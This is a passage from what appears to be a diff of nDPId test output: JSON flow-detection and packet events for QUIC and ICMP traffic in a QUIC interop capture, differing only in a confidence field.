XBSjWA8uw\/1hUs9cHVpYBS0ltoa5wxXIx++EBaRxTWEi36GVZ65l2iVnWKkd\/xq7p88n0OTSzw9MX6zL1vpn8Q3b5hVpTOfk0XSi5xbalOfjBvaK425FOHISkLRT4hHBTrZPDUxwxwBg08G2H36nvO3sZ2DqZCH92UgDfl3OrnJTQ5kZer0RXiGe8JxWv76LxDqR1kJ0SXR282tjRVBUWk2yeunxwz3vNCj4omHVmk44mRi251cY+XJzT44HEva4iNMf74w7Rm7ot9s3dpNfVwJPF0r16L56vzdWhG5cGOJ1D+VSlbkJMR4r0BQwF2\/eCtSeTN+rk="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434629,"flow_last_seen":1603816434629,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816434629,"l3_proto":"ip4","src_ip":"131.159.24.198","dst_ip":"192.168.1.128","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":7.619289} 
+00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434629,"flow_last_seen":1603816434629,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816434629,"l3_proto":"ip4","src_ip":"131.159.24.198","dst_ip":"192.168.1.128","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":7.619289} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434640,"flow_last_seen":1603816434640,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434640,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"51.158.105.98","src_port":45250,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02147{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1603816434640,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434640,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAXZdAAEAReS3AqAGAM55pYrDCEVEE7CF4zAoKCgoI\/WffY03wSeUAAETSMHofJsIVRtpuQGVddBW97CfvMNh6FstJkOMpUt\/yyfMol2NH\/cmw9076\/GVp8Jiw6RRO55nAlaDXRKDx+fRRFB3MWLmB\/9BdlA7rKSF+bxrlmvb7IG3rx2evLnOEA295WB7h7yye\/Yb8SM1ckobonKrZZ3VSIcOyeDvx1To8yKU8S+qgO5UB6V6j3ZR4z8tia9hoRBaJuuWjnRXPIzRC\/Y4Ty4G0TTfbVLamm4ej+5tVGNr3TS7pN2Xzt9lr5OogvAmipVfcrFQmzNA\/+bixOvtJICDh3fR9sII+Aa6F3m95yiDF8HdhXx8TxWV640MZkTOca5MbcwS+YPz+INAIjF0s2owurg4clHkrQ\/h1vY9wfL8cau+doFTFKxQWkVu3t2i\/+mAsWEv1COMBJgtwWY\/1oMYnha9PWceb7bjtXvQ0AFrjBC2iUpE8uKG2lpMj3vw++EDHs4D8UOswAsYKSR3QKTNy5\/n9F2K6wbOe4lbPp1tEUC9i4BjrP65N5Jjd4whCLlWExxdcuUiqmeRWX1rLfPxynJrkw7vqaREC00sCdzi7Lh2rgh1ZgrEUMSznXgMtkuiWXjnmdl6yNUvpIov2oxF5IIqE7+inmRUO\/4bFKluz0rJxSvweOGUOG06qc89\/fVfEYvQVfSGie\/2jaZPAoa73lw60ChYZL5W8YQTUE+iYwCEs\/LrU43Io05inp4fW99XL+dqJLeBaKkadyRCr+ZlWnxdK3SIVAKssrqk8c+dwBP8Ga9TvI0fwtqyE9zLeGdLLth+UrgzbKZkjPtZvumQptE3y8vzXm3rNGckk+s+tH5kfuTErhMMgcEqqghapUSbghSKFnvd8KXrp5I5dImNV23VsAFnZphiNdSMrAO\/5tN9cHTB5kZFEzKzu5mIwtp39YSpIVho1618W4woojYayBTAYGdCFJnsdHAOWZ0YNc9fXqn3t7pH0RfvXqhkQ14VLJ65JuJqy\/Qz9StzBGBZch\/xsRQnL8tGwRc9QlrXGc3QWq7muqAOCyzpHoMChq2oTRE\/8HPgudmPNkrAf\/ScwBASioyMRhmPXbQOnz8kpZqhiLFLzbv+SqaBxgR+bgVYn1+3zxEWz0OQ7t81FdQLiQ\/r7o1w\/5GTxaT2UQy4+HSu3XgrEmc70xQDowI3TS6l1xbMtq6G0wpiqDxghwCsLBT2Jp0llaTYvV20z5T8ax80YSjv99Judp7QAD+5ZWDqxTHKL7rG3JmR6R8uIhzq4m21IYTygNOeNDTZrVPa3NY1BluNOiJM0ojQMwAtKPXhJSECktSWYBn4OIxP0YP6tXleYVmyb\/7bsrgrloCmarQYyCzGzZUopQB5p32ofLV7NTKVj48TfiOfWu7G7+u2kMk6czrGQwjYr399xRe06yg2sy+HVyEgd6XGMtNrXxL3I24LS63NRpc2fVvxrjZFP5bKendh2XIq59I5JF37M+rn6izwnuj0OrSHOnrx4VNLacB+DNwcXJTwF6fVCp5Wfo
IclvXXgD5bQwPAiNcduRQACIAJ6RQmeAmxrOjgDcNXfvMKHilUpISNlFeHOjhQMA+MiaVzNspXJLCod8B953YO\/H92LBu4hBpcVIl5YP489aYAYtVAU\/QpiEmGNr0vZKsef4Zb9RxDNgQgxIA=="} -00998{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434640,"flow_last_seen":1603816434640,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434640,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"51.158.105.98","src_port":45250,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.seemann.io","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +00998{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434640,"flow_last_seen":1603816434640,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434640,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"51.158.105.98","src_port":45250,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": 
{"client_requested_server_name":"quic.seemann.io","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434641,"flow_last_seen":1603816434641,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434641,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"133.242.206.244","src_port":42456,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02151{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1603816434641,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434641,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAJ7VAAEAR9yjAqAGAhfLO9KXYAbsE7ImgzgoKCgoI+QsGqtFYjA8AAETSVUSb8KmUst+PHHzqT2SeL\/P07nKCp3USUYX2DxY7ve1fmgM+d6G2XMZ3HCv4lyQmqoBHOLElyJxOdKbHXGRlPb8Uw+yalWHgIS2xYoZgj5sMn8MqFHMsZqNCggoXKshRMixX78IzGLR2\/lKiD1A4mWU8YHeWKPR7TnPFWL0DkYoQdkBU3xXWNJeqWETA9YozB6efhg2cH2ogJnonWpHROpBEB6lu\/jcG\/MvvNGSQjaR7z3v7jq8Mw3XxsqjwZfgpi304y1BIMudGRSpwPxm1jggsFOOXDIKWUaaGiA8X1EtpSPbruNIaK\/L8nYCzR9\/1l92Fw0JngzKyN6xNFLLYtOKoV1Pwa0efysfY2dAAzQNo7LPVtGghy0jghB\/MURPiryuRJr7wLMN4\/xkziyibDmu9JuazbAVT5UQo01\/BC8SQIa5x6yjASIJd2bcftTT20FM1jxDiA3ArSF1FxI0DGP+Jup6uykp66yBe41NxzaF3JQhi3TYG05c9pWzR4rpiqKPbw8ISxSbEYLfqoBX7ZUxcl+Qs7EKjfeI5rSefpJ79UTAq2IOiRgmJMMPilU+j\/185uZ3gWFqXxY4lgvGRDb5sAaglqlZSnbVW0el8W0GPbw+\/aZQWJkNyosBG0ozqSDnxIVCgg0DqM7BVwbstGqm3b9mynQaPfUAvtCmsTRJuCzcgqkIiUtIZwgZHsP4B
e4bN3A3Q2DeS1HWXmwRv5KaOe44h9q+4TtSXNmmmmTGGXWu2YAX7Lgvd0URyUOZt4f1KhTFK\/k8sK43+MB6mD4td8sjJsQiy0V30FZY3CtSNXK7u4R6vEWsgJPI55D4UDnEYK2uN8lk+fDHWtQbSlQqu0U4znKSeK2EAX9xBVuEJeh5HeX4+cNWyIRDmAoYsQmQgmHBoD6pedxp9SXnK9s\/7uoVpaKxNV9ZM\/iWMB\/uKFhDd1+o1EWWjwuWds0vy+ZbywiOwrY6ffiSgerdtWkuaQf7H9QdZ0UjwbnJvPjya7DyyPtvP8PWp\/N1D867R\/QvkR8ZIaOdSzOuUYBF\/bpCqsIrnKeR9VUtP9FyxkgG\/D6+0uEUl1c779cxCQck2S\/t2diwFSth\/DmYwuknya3f6okawJcF12dISBsiADyiScw4IixWhDn\/\/uIv78yc9e+mYJhjZyPxGXEyGiSruZ8bPrtfTna0\/r1NWY3ZypYWBjkDiSvD3Zfa1+eJsREXjUDRwmFnIeE1AgD9eHr4oXUc9yJ0M0cy1rxfrdBrPiv\/e9MTJXnRIvBev2VujEE1pdbaj\/uNoH8Iud1E4wh4YfsafTjdd+pK20QBXt1fVDPye\/nA\/auW82P\/6KerEyR8YFb1Q5decEBub3RIeRj1Zngb5dOSVgZS4YCk2C7bsuJFE8JSiO5eFBdWQrY9tTmedksZFAA6HhJPngNaUeVLzpnQktjQ5caPa6W7\/wHdT3eGdJpDXMcegGharvIfBkRc9tQPIVXwcqIbyrB3nyDdj71w60xBtjcgnuLW+j+IpTtj+MDyKaFGpdmJ95nu62ZA4gWFibO+sNt5rW4Ayr9RTU1vnb545kUJfXX39XayUfvMOvDTraKzQ3G7U4a0GC+KFmI9u9t3VltkEq5ickl9h+mNSdzqETNFgrEr943KdW+amAA=="} -00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434641,"flow_last_seen":1603816434641,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434641,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"133.242.206.244","src_port":42456,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"h2o.examp1e.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 
+00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434641,"flow_last_seen":1603816434641,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434641,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"133.242.206.244","src_port":42456,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"h2o.examp1e.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434642,"flow_last_seen":1603816434642,"flow_idle_time":140000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"thread_ts_msec":1603816434642,"l3_proto":"ip6","src_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 
02141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1603816434642,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434642,"pkt":"PKn0qB\/spJGxgjQ5ht1gBmesBNg6MCABSAB4FwEBvnZO\/\/4EYx0gAQsHCsnVrqTT\/kdpHoB9AQRbQQAAAABgAK6QBNgRMCABCwcKydWupNP+R2kegH0gAUgAeBcBAb52Tv\/+BGMdhooBuwTYZF3MCgoKCgiLyuadTBhpMAAARL5Jn8vg\/A\/iHcc5HGyjUHtzYCYh3M+1HzdHtSjFxotnADrnTs2cVW9HALnbbxq+j13Bpa3hTOGyFKAuVKKOVbHcGaJLdNA06DSFzV66GiVnWQJ+1MFEeQ+EHU1tYSy5DynacUlvf1G20dd2kmKE70+xxOTQI+IxdCf39TGHKu+pGUdVYYzStvwWo5npAklpjTRW1hPHPgr+vxfK0tzntAB4tgdSsfnM003avASiWDb+GIQGRqQqd12Z3S73M6xSxbEpPhQs03GVV7j7jPCY+xuSqdE0+RC2M2xTxkDxrKzwifOo5JzioGQ8n1leAaytkPPh7\/6kP3tXKc3zSh+6mDapIcrXvGRPBtxzjcwZlnfC61xJLZ4o\/bDf7VXUn2iqev2r7RfntxDJ4F+CHoqdQU19Agb1DRLZ+44sSsLJRZPe0rMYqmphZb9TR\/CXfZoxmWSMgVmNHVqPhkUDRkBFiFUg2qWtzD6IUIlCi4UB90+3QDAMKbHPStmRV90FoZ4qgb1QWQshIsAOJrfADpMoeQeOvpHnWSBMA4n5tbORKddl3SJHwqDMa\/kYlEza3HmYzKyIekgCLUxBLZMgtxwl0pUeJvIYxMdZF6Znn7pRsQ+GhZyet6ZCOM2ft7uJCMRH5bphpdavcWHTrSt8uZ2iyfo3VofxaZqdzUsHHTpc9bD205szhfCxENgNATF1PGuWlfKJUrPPjUWPpw65iGFR3+hPQ1+ZRRE7orDx2vkC5kOJiEvbv0d6sp6yfMo3tuOn4kXULD2rf5TSc8aqDVZCklaUIbEuKaQv0jni\/XkpmdOw2UlUp3oYLZ9on+kdq43Nf9WrEJ+gfSZPMUZsyhXXyPRNGMrTBo0SUX31QcOdzW7AQaAXnJRZob+0gus27voTqIEPJh01fxeGPbXNNQ7VzwarPIKHRq1lGIs\/wJwJCsm2hQjq0+K3VFq4cXacrOp5mbdbbDJRXEnCejUnTswq7Ga3dz818NNmVp7FoznVEcHX3RQBfk8eLveHtTEpxIgmvWuj5aaZt+HyxH\/0YALf+wz6lv1s1l\/hg9o2e11OlebH1k7T7awcxgi41AZepwsE50V3GVh5GwIfK89lz9Ro6tly3hUhrsJ2ja1C+A6RBrWVVdcIlZY4BlIcSzf0BUccadkfpP\/Enz0yFkuHTLXTyrmsvl44wgxOvsJrZMwFacqnccJZHwZHWEMkNcxcPbL0Z2U7a3Xa12dEVYYVu1U+X65oQyb2yPkBqMJ+DTB9RU+DnZIynnRzCZZkuvH7Uzn\/zVoVu3fNULVHSP4L+ehdOiOmS0l9r6IzvZQbe+xLjtz2iXbuU36zKNhA17n0gtw0JDOpoFDbD0FwhdY1JUMZx18mcrbFQX02CO02e+BE1Anxc\/TfBIKj2hI2ObT4d57WIvq7cpwJxNd
ZMuBfjVhAX64+5X4J\/pGNdD3WMTo1fYU74kzII9sWnijVE1WzVIBymOIxdGDOuxbCm5vJaE\/oIJEfaWcfmDwa+jhxCRN2aqJvKC+Iwq2cNN7z7vgOXAZ9SIrdZFgVX8+v9NO3ca9aZg=="} -00678{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434642,"flow_last_seen":1603816434642,"flow_idle_time":140000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"thread_ts_msec":1603816434642,"l3_proto":"ip6","src_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00678{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434642,"flow_last_seen":1603816434642,"flow_idle_time":140000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"thread_ts_msec":1603816434642,"l3_proto":"ip6","src_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 
00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434643,"flow_last_seen":1603816434643,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434643,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"71.202.41.169","src_port":50289,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02144{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1603816434643,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434643,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAVf9AAEARrFLAqAGAR8opqcRxEVIE7K+PxgoKCgoIvbmHXcmpQ\/MAAETS3vbU8Sj6l2wQUfqZRc1xY7UZLfv8ZezreoQxaXMMFQplcHI2WGivL79HCn+gIsF8oZtTfotO31JT7vkJlhmOnm3lffZWDOZVO38TNr5VVART1r1V9c6QtCPl2rOLEXod3QmseC2zkUY1D5vxPNLpAyblFgLtoVLKMFRlexYKVyLMEaY69TsXwdxzuRMmPQ8UL6uRNnJiBB3upwv58iisAqq\/mRUYsFRLcP1OPYHQb5CZdE1Q\/A+91wfQFJGWqFUY9F+EFUVCV4bxdetx31E8OGGq+18vcHmg7G0LGgeINT+xkb92oyBcQkbST\/RWAy9hTbi4JTuezLjGIBdZzSMVzF4I6bcizx7siMmVUTnl3UmC\/rxQUcKk8XFu2YJs9y2Os4+WhVjMwJbIx\/bkcUSXo\/NnUnrT4jCwxD6nX7oTObYUuq8Cnz5uWFN6MRwb1OvukfRscRjrcumAQBklq8PagQJe6Oyy9xDjeo0pQi33fo\/c8Y2ccYq0oba\/ZjGmaTjWjw4fyRgR2xdNJWEfSX9rXqOdXmuGVEnT1hq2hHX+bWhy2QkCI7BHn0dcsep8lx89ym717WWE\/Xbpk0tFl\/pCnOGrBuniD5HFSZDdjSGLJoEXvoHbpOgi\/IJCVo50+AcmmA1BKQpFl8EapwyTEeKmc\/teOj7E7tI\/aOzLNeX8EUS3z24mYkZTFOR32Oujeu3clt1f1qtieJ4Tya9ptPHxYnje1QnGDP7dwz5gh676z5hDQGO4+4bo6ul6N0iIcXDo+Yt7zeunYaItRqPosZXZf2RDRVFhaPMyZpD37kbwM3I2xJNOsJXPxB4VObi0enWqgsSeRLY928BMaf67KliYniVAoxk2r104WSZUE7jxtTguYe4EME09Q5d6rrjnTfQPYIelchCLjz7
IISF0G4QSth+iInqIg43sXwXNGEiA5n2ll+d4YEisZf5kJw7z7z4H8LHdJs0yPLtOkDemSyBDayKCguo3SC6thZsf4fL8MHcNaDnsBOQ3qsjckq3DPrhBaaQQ\/PnOQb0Pep8XXsjDPf1z6oYyQ5OmCTSiiICzO3jhCvp6VkuawZ63dTmMdwG07DNkuUzrCU1s3uXcU3hD432hU+A1bUo4tC\/eVs7\/Cg1UBIH4KQAD55x1zc1rsEiqb1C7faMv3OYy2TY2rHCzIrLKBxU59Q7kRtUbmutTo74p7kwrrlSTJCO1YNPtU6XBWtj7wzz81NndAWB6N0QAk8std4i2V6WuY2cGSRu66EYGTh\/8K91k4tTDBWpfGf4TNDSp5t5T0dGpvXA5zPG8DWjbXuVi7ELoqM51NEc8d7+IK2OCAdmYpX1PsoZL0Lbaw475Ho+KFWuruhhhwa7wzva4K3thZxpZy0eBP044yQ0lANRgJ3bThJg8RPAeJgPvuqFcX20la91uDGheq8GjpqmA35Zc3CODLtZQpRoUd6coXnW9stWjWC7LAp2e921jv6NfJLWpnOIL3\/YvqFROrdJzbLYKnKNfCTryzQPuJNK60hRlQe0ccZ844JLUpRAYdtGzZkFKHhFRXy6oBkYx1M3HW\/UE2PcwS\/IjPcNZbTy+fdv2atp2T3sGZ4LPZca6tbu49as0q5fcEgS\/u25\/J8syzbevr8VL71PTWp8v54ud1Q=="} -00996{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434643,"flow_last_seen":1603816434643,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434643,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"71.202.41.169","src_port":50289,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"71.202.41.169","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 
+00996{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434643,"flow_last_seen":1603816434643,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434643,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"71.202.41.169","src_port":50289,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"71.202.41.169","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434643,"flow_last_seen":1603816434643,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434643,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:bc8:47a4:1c25::1","src_port":49270,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02144{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1603816434643,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434643,"pkt":"pJGxgjQ5PKn0qB\/sht1gDhbcBNgRQCABCwcKydWupNP+R2kegH0gAQvIR6QcJQAAAAAAAAABwHYRUgTYy97JCgoKCgizoUNUPmNvHgAARL7kE1\/vTL\/NMlU9dFfohroNb3lFa0sajkl+NYJsmpdZxseLTol2hdZqlkF1hqB0ifjTUijhcAiX+sblrKEYN3cCa28xTnru44DNDzMC4mlv4HrZOqLLNO\/UlY1sQ8NKCbNtoSq21p7clWer16m4TAw7H\/F9E3AX\/MdNlxeqaKJvymPkTEmiXkH2WePQ14zEX\/OsIv\/9nKZprtTphxJOpWh9iC60eXUS92cRfpPE4t2QsqYFBWlVb+13SoAgtAjkrTvvSLYg\/D9UbwBgPzj7R4p4Cd+bbadGFWvc8wcjuV9E+a+X5gFeHhOOh92iUHSpTT\/SzNsRBUS9i7htX+D9DZZfG6yrrqJwDVKCG3skrDDAnAOEIj5wc9E6ktIWj727nJPaG4F\/yFeB9mvF4BGMSF2t1HX1v3Uf8fd+2\/CrVkIpM1QnAbm2kykvcJlPK0VaRsZgQsar09\/xE1coUXATF0tDX6QEFU7xe84fN1PUk1FXFUXQjOBwq0tYTTcPCN4qGKSXtiP22FkC3\/OV2TW+6RsyY4afHoIc55iP9uTyiDz8GgsOMMcDAt86zjUpsGFleM3dlpIjA5SRInS88gDuKFXQazWcKMDZGgZ5OzzGPWiaCCElrFoU6Z0C9Z3M3gT5NV2VJc1gEss3QWIiObA5nJk+9E